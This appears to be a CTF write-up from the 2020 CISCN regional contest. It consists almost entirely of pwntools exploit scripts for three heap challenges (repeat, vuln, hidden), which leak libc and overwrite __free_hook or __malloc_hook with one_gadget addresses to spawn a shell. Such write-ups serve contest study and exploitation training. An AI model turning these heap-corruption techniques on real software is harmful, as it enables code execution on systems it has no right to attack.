2020 ciscn 华东南分区赛 pwn wp

Posted on 2020-10-24  28 Views


pwn3

pwn4 repeat

#!/usr/bin/python
#coding;utf-8

from pwn import *


context.log_level='debug'


context.update(arch='amd64',os='linux',timeout=1)

if args.Q:
	io=remote()
else:
	io=process("./repeat")


def cir(sz,ct1,ct2):
	io.sendlineafter("Size: ",str(sz))
	io.sendlineafter("Content: ",ct1)
	io.sendlineafter("Content: ",ct2)

if __name__=="__main__":
	cir(0x410,'','a')
	cir(0x410,'','a')
	libc=u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x3ebc0a
	log.success("libc==>"+hex(libc))
	free_hook=libc+0x3ed8e8
	one_gadgets=libc+0x4f3c2
	cir(0x40,'b'*0x40+p64(0)+p64(0x31),'\x00')
	cir(0x40,'b'*0x40+p64(0)+p64(0x31)+p64(free_hook),'x')
	io.sendlineafter("Size: ",str(0x20))
	io.sendlineafter("Content: ",'a')
	#gdb.attach(io,'b *0x0000555555554000+0xaa2')
	io.sendlineafter("Content: ",p64(one_gadgets))
	
	#gdb.attach(io,'b *0x0000555555554000+0xaa2')
	io.interactive()

pwn5 vuln

  • 只有add和edit功能。想到io和hoo,然后hoo的时候通过scanf输入大量字符分配缓冲区,使edit溢出。然后在来个hoo。
#!/usr/bin/python
#coding:utf-8

from pwn import *

context.log_level='debug'
context.update(arch="amd64",os='linux',timeout=1)


if args.Q:
	io=remote()
else:
	io=process("./vuln")
	
def add(sz,ct='a'):
	io.sendlineafter("choice:\n",'1')
	io.sendlineafter("size:\n",str(sz))
	io.sendafter("content:\n",ct)
def edit(sz,ct='a'):
	io.sendlineafter("choice:\n",'2')
	io.sendlineafter("sz:\n",str(sz))
	io.sendafter("content:\n",ct)
	
def leak():
	stdout=0x601020
	add(0x20)
	edit(0x30,'a'*0x20+p64(0)+p64(0x1000-0x250-0x30))
	for i in range(0xc):
		add(0x100)
	add(0x20)
	io.sendlineafter("choice:\n",'1')
	io.sendlineafter("size:\n",'1'*0x400)
	edit(0x60,'a'*0x20+flat(0,0x71,stdout))
	add(0x60)
	add(0x60,'\x60')
	add(0x60,flat(0xfbad1800,0,0,0)+'\x00')
	libc=u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x1e7570
	log.success("libc==>"+hex(libc))
	malloc_hook=libc+0x1e4c30
	one_gadget=libc+[0x106ef8,0xe237f,0xe2383,0xe2386][2]
	add(0x20,'a')
	edit(0x30,'a'*0x20+p64(0)+p64(0x1000-0x30))
	for i in range(0xe):
		add(0x100)
	add(0x30)
	add(0x40)
	io.sendlineafter("choice:\n",'1')
	io.sendlineafter("size:\n",'1'*0x400)
	edit(0x70,'a'*0x40+flat(0,0x71,malloc_hook))
	add(0x30)
	add(0x30,p64(one_gadget))
	io.sendlineafter("choice:\n",'1')
	io.sendlineafter("size:\n",str(0x10))
	#payload  = "A" * 0x10
	#payload += (p64(0) + p64(0x111) + p64(stdout))
	#edit(0x10 + 0x18, payload)
  
	#add(0x108, "dummy")
	#gdb.attach(io)
	io.interactive()
if __name__=='__main__':
	leak()

pwn6 hidden

#!/usr/bin/python
#coding:utf-8
#off-by-null
from pwn import *

context.update(arch='amd64',os='linux',timeout=1)
context.log_level='debug'


if args.Q:
	io=remote()
else:
	io=process("./hidden")
def add(idx):
	io.sendlineafter("choice: \n\n",'1')
	io.sendline('1')
	io.sendlineafter("idx\n\n",str(idx))
	io.sendline(str(idx))
	 
def edit(idx,ct):
	io.sendlineafter("choice: \n\n",'2')
	io.sendline('2')
	io.sendlineafter("idx\n\n",str(idx))
	io.sendline(str(idx))
	io.sendafter("mark\n\n",ct)
def dele(idx):
	io.sendlineafter("choice: \n\n",'3')
	io.sendline('2')
	io.sendlineafter("idx\n\n",str(idx))
	io.sendline(str(idx))
#heap=0x555555558460
def leak():
	add(0)
	dele(0)
	edit(0,'a'*8)
	leak=u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x3c4d98
	log.success("libc_base==>"+hex(leak))
	malloc_hook=leak+0x3c4b10
	#one_gadget=leak+[0x45226,0x4527a,0xf0364,0xf1207][1]
	one_gadget=leak+[0x45226,0x4527a,0xf0364,0xf1207][0]
	realloc=leak+0x84710
	edit(0,p64(malloc_hook-0x23))
	add(1)
	add(0)
	edit(0,'\x00'*11+p64(one_gadget)+p64(realloc+4))
	#edit(0,'\x00'*19+p64(one_gadget))
	gdb.attach(io,'b *0x7ffff7a522a4')
	add(1)
	io.interactive()
	
if __name__=="__main__":
	leak()